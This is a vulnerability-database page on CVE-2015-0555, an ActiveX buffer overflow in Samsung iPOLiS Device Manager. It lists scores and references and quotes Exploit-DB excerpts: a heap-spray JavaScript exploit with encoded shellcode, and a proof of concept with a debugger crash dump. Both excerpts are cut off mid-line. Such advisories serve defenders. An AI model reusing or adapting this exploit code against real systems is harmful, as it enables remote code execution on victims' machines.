CVE-2015-0555
published 2015-02-24CVE-2015-0555: Buffer overflow in the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager 1.12.2 allows remote attackers to execute arbitrary code…
PriorityP343medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
6.39%
92.8th percentile
Buffer overflow in the XnsSdkDeviceIpInstaller.ocx ActiveX control in Samsung iPOLiS Device Manager 1.12.2 allows remote attackers to execute arbitrary code via a long string in the first argument to the (1) ReadConfigValue or (2) WriteConfigValue function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| samsung | ipolis_device_manager | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Samsung iPOLiS - ReadConfigValue Remote Code Execution
exploitdb·2015-04-14
CVE-2015-0555 Samsung iPOLiS - ReadConfigValue Remote Code Execution
Samsung iPOLiS - ReadConfigValue Remote Code Execution
---
var shellcode = unescape('%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u4100');
var bigblock = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length
Exploit-DB
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
exploitdb·2015-02-22·CVSS 6.8
CVE-2015-0555 [MEDIUM] Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)
---
Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC
var arg1 = "";
var arg2="praveend";
for (i=0; i
0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C
Block Disassembly:
149423 XOR EDI,EDI
149425 XOR ESI,ESI
149427 MOV [EBP-8C],ECX
14942D TEST ECX,ECX
14942F JLE SHORT 00149496
149431 MOV EDX,[EBP+8]
149434 MOV AL,[ESI+EDX] Asc: defaultV
EBP+16 647790C1 -> EBE84589
EBP+20 FFFFFFFE
EBP+24 646CBE5C -> CCCCCCC3
EBP+28 0000001C
Stack Dump:
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE58
No writeups or analysis indexed.
http://packetstormsecurity.com/files/131421/Samsung-iPOLiS-1.12.2-ReadConfigValue-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2015/Feb/81http://packetstormsecurity.com/files/131421/Samsung-iPOLiS-1.12.2-ReadConfigValue-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2015/Feb/81
2015-02-24
Published